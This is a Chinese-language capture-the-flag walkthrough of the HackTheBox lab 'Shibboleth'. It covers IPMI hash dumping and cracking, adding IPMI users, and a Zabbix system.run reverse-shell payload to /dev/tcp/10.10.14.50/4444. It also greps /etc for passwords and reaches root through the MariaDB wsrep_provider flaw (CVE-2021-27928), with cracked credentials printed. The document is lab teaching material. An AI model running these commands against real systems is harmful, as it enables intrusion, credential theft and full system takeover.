\# nmap 10.10.11.124 --min-rate=1000 -sV -sC -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2021\-11-23 23:32 EST
Nmap scan report for loaclhost (10.10.11.124)
Host is up (0.21s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41
|\_http-title: Did not follow redirect to http://shibboleth.htb/
|\_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: shibboleth.htb
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 84.40 seconds
10.10.11.124 shibboleth.htb
扫一下vhost,没有东西。扫一下UDP 嘿嘿
\# nmap -sU -p 623 10.10.11.124 255 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2021\-12-13 21:57 EST
Nmap scan report for 10.10.11.124
Host is up (0.50s latency).
PORT STATE SERVICE
623/udp open asf-rmcp
Nmap done: 1 IP address (1 host up) scanned in 1.20 seconds
发现一个UDP端口,服务是**asf-rmcp**
在hack tricks中有详细描述
经过我的测试发现可以通过msf的扫描模块判断版本
`msf6 auxiliary(scanner/ipmi/ipmi_version) > show options`` ``Module options (auxiliary/scanner/ipmi/ipmi_version):`` ` `Name Current Setting Required Description` `---- --------------- -------- -----------` `BATCHSIZE 256 yes The number of hosts to probe in each set` `RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit` `RPORT 623 yes The target port (UDP)` `THREADS 10 yes The number of concurrent threads`` ``msf6 auxiliary(scanner/ipmi/ipmi_version) > set rhost 10.10.11.124``rhost => 10.10.11.124``msf6 auxiliary(scanner/ipmi/ipmi_version) > run`` ``[*] Sending IPMI requests to 10.10.11.124->10.10.11.124 (1 hosts)``[+] 10.10.11.124:623 - IPMI - IPMI-2.0 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0)``[*] Scanned 1 of 1 hosts (100% complete)``[*] Auxiliary module execution completed`
还可以使用ipmi_dumphashes模块导出密码hash
`msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes``msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > show options`` ``Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):`` ` `Name Current Setting Required Description` `---- --------------- -------- -----------` `CRACK_COMMON true yes Automatically crack common passwords as they are obtained` `OUTPUT_HASHCAT_FILE no Save captured password hashes in hashcat format` `OUTPUT_JOHN_FILE no Save captured password hashes in john the ripper format` `PASS_FILE /usr/share/metasploit-framework/data/wordl yes File containing common passwords for offline cracking, one per line` `ists/ipmi_passwords.txt` `RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/` `Using-Metasploit` `RPORT 623 yes The target port` `SESSION_MAX_ATTEMPTS 5 yes Maximum number of session retries, required on certain BMCs (HP iLO 4, etc)` `SESSION_RETRY_DELAY 5 yes Delay between session retries in seconds` `THREADS 1 yes The number of concurrent threads (max one per host)` `USER_FILE /usr/share/metasploit-framework/data/wordl yes File containing usernames, one per line` `ists/ipmi_users.txt`` ``msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 10.10.11.124``rhosts => 10.10.11.124``msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run`` ``[+] 10.10.11.124:623 - IPMI - Hash found: Administrator:47154804820c0000bc853ff7b9461288b451b6b8a7d227497953d2951254b5672b33551bcaf7f67da123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:77b68095fc39772bcae117e7963cef0dc5f41e3f``[*] Scanned 1 of 1 hosts (100% complete)``[*] Auxiliary module execution completed`
使用hashcat破解
`└─# hashcat -h|grep ipmi` `└─# hashcat -h|grep -i ipmi #-i参数匹配不区分大小写 1 ⨯` `7300 | IPMI2 RAKP HMAC-SHA1 | Network Protocols``└─# hashcat -m 7300 /tmp/1 /usr/share/wordlists/rockyou.txt`` ``Dictionary cache hit:``* Filename..: /usr/share/wordlists/rockyou.txt``* Passwords.: 14344385``* Bytes.....: 139921507``* Keyspace..: 14344385`` ``47154804820c0000bc853ff7b9461288b451b6b8a7d227497953d2951254b5672b33551bcaf7f67da123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:77b68095fc39772bcae117e7963cef0dc5f41e3f:ilovepumkinpie1` `Session..........: hashcat``Status...........: Cracked``Hash.Name........: IPMI2 RAKP HMAC-SHA1``Hash.Target......: 47154804820c0000bc853ff7b9461288b451b6b8a7d22749795...f41e3f``Time.Started.....: Mon Dec 13 22:09:58 2021 (3 secs)``Time.Estimated...: Mon Dec 13 22:10:01 2021 (0 secs)``Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)``Guess.Queue......: 1/1 (100.00%)``Speed.#1.........: 2627.7 kH/s (0.69ms) @ Accel:1024 Loops:1 Thr:1 Vec:8``Recovered........: 1/1 (100.00%) Digests``Progress.........: 7397376/14344385 (51.57%)``Rejected.........: 0/7397376 (0.00%)``Restore.Point....: 7393280/14344385 (51.54%)``Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1``Candidates.#1....: iloverobert!!! -> ilovemymum64.`` ``Started: Mon Dec 13 22:09:41 2021``Stopped: Mon Dec 13 22:10:02 2021`
一个用户信息
Administrator:ilovepumkinpie1
这个功能点还可以添加用户(貌似还可以权限,不知道有用没),可以ssh登录。无ssh,无法登陆
`apt install ipmitool``ipmitool -I lanplus -C 0 -H 10.10.11.124 -U Administrator -P ilovepumkinpie1 user set name 3 hehe``ipmitool -I lanplus -C 0 -H 10.10.11.124 -U Administrator -P ilovepumkinpie1 user set password 3 hehe``ipmitool -I lanplus -C 0 -H 10.10.11.124 -U Administrator -P ilovepumkinpie1 user priv 3 4``ipmitool -I lanplus -C 0 -H 10.10.11.124 -U Administrator -P ilovepumkinpie1 user enable``└─# ipmitool -I lanplus -C 0 -H 10.10.11.124 -U Administrator -P ilovepumkinpie1 user list 1 ⨯``ID Name Callin Link Auth IPMI Msg Channel Priv Limit``1 true false false USER``2 Administrator true false true USER``3 hehe true false true USER`
然后感觉没招了。无奈,做了一个vhost扫描,发现有vhost有三个子域名。访问发现是一个登录口
mail.shibboleth.htb
monitor.shibboleth.htb
zabbix.shibboleth.htb
用户密码成功登录。版本较新5.0.17。网上没有这个版本的洞。扫一下目录,如下,没什么关键的
Target: http://zabbix.shibboleth.htb/
\[09:07:44\] Starting:
\[09:07:57\] 301 \- 327B \- /js \-\> http://zabbix.shibboleth.htb/js/
\[09:11:11\] 301 \- 328B \- /app \-\> http://zabbix.shibboleth.htb/app/
\[09:11:16\] 301 \- 331B \- /assets \-\> http://zabbix.shibboleth.htb/assets/
\[09:11:16\] 403 \- 286B \- /assets/
\[09:11:17\] 301 \- 330B \- /audio \-\> http://zabbix.shibboleth.htb/audio/
\[09:11:41\] 301 \- 329B \- /conf \-\> http://zabbix.shibboleth.htb/conf/
\[09:11:42\] 403 \- 286B \- /conf/
\[09:12:20\] 301 \- 330B \- /fonts \-\> http://zabbix.shibboleth.htb/fonts/
\[09:12:24\] 200 \- 32KB \- /favicon.ico
\[09:12:37\] 200 \- 2KB \- /image.php
\[09:12:40\] 301 \- 332B \- /include \-\> http://zabbix.shibboleth.htb/include/
\[09:12:40\] 403 \- 286B \- /include/
\[09:12:47\] 500 \- 0B \- /include/config.inc.php
\[09:13:01\] 403 \- 286B \- /js/
\[09:13:11\] 301 \- 330B \- /local \-\> http://zabbix.shibboleth.htb/local/
\[09:13:14\] 403 \- 286B \- /local/
\[09:13:24\] 200 \- 2KB \- /maintenance.php
\[09:13:26\] 200 \- 2KB \- /map.php
\[09:13:36\] 403 \- 286B \- /modules/
\[09:13:36\] 301 \- 332B \- /modules \-\> http://zabbix.shibboleth.htb/modules/
\[09:14:30\] 200 \- 974B \- /robots.txt
\[09:14:37\] 403 \- 286B \- /server-status/
\[09:14:37\] 403 \- 286B \- /server-status
\[09:14:42\] 200 \- 2KB \- /setup.php
\[09:15:19\] 403 \- 286B \- /vendor/
查资料知道Zabbix 有一个参数存在可以命令执行
找到
尝试创建一个item
所以我们的payload
system.run\["/bin/bash -i >& /dev/tcp/10.10.14.50/4444 0>&1",nowait\]
点击TEST按钮即可。查了好多资料,发现这个地方使用的限制比较大,默认不开启这个方法。
cat /etc/passwd |grep \-v nologin|grep \-v false \# -v 管道符不显示
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
ipmi-svc:x:1000:1000:ipmi-svc,,,:/home/ipmi-svc:/bin/bash
尝试获取flag,发现无权限
\-rw-r----- 1 ipmi-svc ipmi-svc 33 Dec 14 07:01 /home/ipmi-svc/user.txt
看到有开启3306端口
`zabbix@shibboleth:/tmp$ netstat -ant``netstat -ant``Active Internet connections (servers and established)``Proto Recv-Q Send-Q Local Address Foreign Address State` `tcp 0 0 0.0.0.0:10050 0.0.0.0:* LISTEN` `tcp 0 0 0.0.0.0:10051 0.0.0.0:* LISTEN` `tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN` `tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN` `tcp 0 13 10.10.11.124:51748 10.10.14.50:4444 ESTABLISHED``tcp 0 1 10.10.11.124:35144 1.1.1.1:53 SYN_SENT` `tcp6 0 0 :::10050 :::* LISTEN` `tcp6 0 0 :::10051 :::* LISTEN` `tcp6 0 0 :::80 :::* LISTEN` `tcp6 0 0 ::1:10051 ::1:45644 TIME_WAIT` `tcp6 0 0 10.10.11.124:80 10.10.14.50:45332 TIME_WAIT` `tcp6 0 0 10.10.11.124:80 10.10.14.50:45340 TIME_WAIT` `tcp6 0 0 ::1:10051 ::1:45604 TIME_WAIT` `tcp6 0 0 10.10.11.124:80 10.10.14.50:45344 ESTABLISHED``tcp6 0 0 10.10.11.124:80 10.10.14.50:45336 TIME_WAIT` `tcp6 0 0 ::1:10051 ::1:45612 TIME_WAIT` `tcp6 0 0 10.10.11.124:80 10.10.14.50:45342 TIME_WAIT` `tcp6 0 0 10.10.11.124:80 10.10.14.50:45334 TIME_WAIT` `tcp6 0 0 ::1:10051 ::1:45558 TIME_WAIT` `tcp6 0 0 10.10.11.124:80 10.10.14.50:45330 TIME_WAIT` `tcp6 0 0 ::1:10051 ::1:45586 TIME_WAIT` `tcp6 0 0 ::1:10051 ::1:45596 TIME_WAIT`
\[-\] MYSQL version:
mysql Ver 15.1 Distrib 10.3.25-MariaDB, for debian-linux-gnu (x86\_64) using readline 5.2
搜索一下发现有个刚出炉的。影响范围是:
MariaDB 10.2 before 10.2.37
10.3 before 10.3.28
10.4 before 10.4.18
10.5 before 10.5.9
https://github.com/Al1ex/CVE-2021-27928
查看zabbix配置文件,发现无权限,如下
`drwxr-xr-x 4 root root 4096 Nov 8 11:02 .``drwxr-xr-x 96 root root 4096 Nov 8 11:02 ..``-r-------- 1 zabbix zabbix 33 Apr 24 2021 peeesskay.psk``drwxr-xr-x 2 www-data root 4096 Apr 27 2021 web``-rw-r--r-- 1 root root 15317 May 25 2021 zabbix_agentd.conf``-rw-r--r-- 1 root root 15574 Oct 18 09:24 zabbix_agentd.conf.dpkg-dist``drwxr-xr-x 2 root root 4096 Apr 27 2021 zabbix_agentd.d``-rw-r----- 1 root ipmi-svc 21863 Apr 24 2021 zabbix_server.conf``-rw-r----- 1 root ipmi-svc 22306 Oct 18 09:24 zabbix_server.conf.dpkg-dist`
是没有密码。尝试su+弱密码,试了好多不行
想到上面的密码试了可以
ipmi-svc@shibboleth:/home$ id
uid\=1000(ipmi-svc) gid\=1000(ipmi-svc) groups\=1000(ipmi-svc)
没找到什么关机的信息泄露,使用
`ipmi-svc@shibboleth:/home$ grep -iR passw /etc/``grep: /etc/at.deny: Permission denied``/etc/zabbix/zabbix_agentd.conf:# Alias=zabbix.userid:vfs.file.regexp[/etc/passwd,^zabbix:.:([0-9]+),,,,\1]``/etc/zabbix/zabbix_server.conf.dpkg-dist:### Option: DBPassword``/etc/zabbix/zabbix_server.conf.dpkg-dist:# Database password.``/etc/zabbix/zabbix_server.conf.dpkg-dist:# Comment this line if no password is used.``/etc/zabbix/zabbix_server.conf.dpkg-dist:# DBPassword=``/etc/zabbix/zabbix_server.conf:### Option: DBPassword``/etc/zabbix/zabbix_server.conf:# Database password.``/etc/zabbix/zabbix_server.conf:# Comment this line if no password is used.``/etc/zabbix/zabbix_server.conf:DBPassword=ipmi-svc@shibboleth:/home$ grep -iR passw /etc/``grep -iR passw /etc/``grep: /etc/at.deny: Permission denied``/etc/zabbix/zabbix_agentd.conf:# Alias=zabbix.userid:vfs.file.regexp[/etc/passwd,^zabbix:.:([0-9]+),,,,\1]``/etc/zabbix/zabbix_server.conf.dpkg-dist:### Option: DBPassword``/etc/zabbix/zabbix_server.conf.dpkg-dist:# Database password.``/etc/zabbix/zabbix_server.conf.dpkg-dist:# Comment this line if no password is used.``/etc/zabbix/zabbix_server.conf.dpkg-dist:# DBPassword=``/etc/zabbix/zabbix_server.conf:### Option: DBPassword``/etc/zabbix/zabbix_server.conf:# Database password.``/etc/zabbix/zabbix_server.conf:# Comment this line if no password is used.``/etc/zabbix/zabbix_server.conf:DBPassword=bloooarskybluh`
发现了密码在/etc/zabbix/zabbix_server.conf文件中,查看一下发现有DBname
DBName=zabbix
DBUser=zabbix
DBPassword=bloooarskybluh
mysql :mysql -u zabbix -p bloooarskybluh 连接成功
`ps aux |grep mysql``root 31066 0.0 0.0 2608 1704 ? S 10:22 0:00 /bin/sh /usr/bin/mysqld_safe``root 31189 0.7 2.9 1740284 118544 ? Sl 10:22 0:06 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/x86_64-linux-gnu/mariadb19/plugin --user=root --skip-log-error --pid-file=/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock``root 31190 0.0 0.0 10572 1064 ? S 10:22 0:00 logger -t mysqld -p daemon error``zabbix 33567 0.0 0.0 9036 736 ? S 10:37 0:00 grep mysql`` `
有了数据库连接 + CVE-2021-27928(root权限启动+命令注入) = root权限
mysql \-u zabbix \-p \-h 127.0.0.1 \-e 'SET GLOBAL wsrep\_provider="/tmp/backdoor.so.1";'
生成反弹shell的一个so文件,传递过去。启动一下,成功获取权限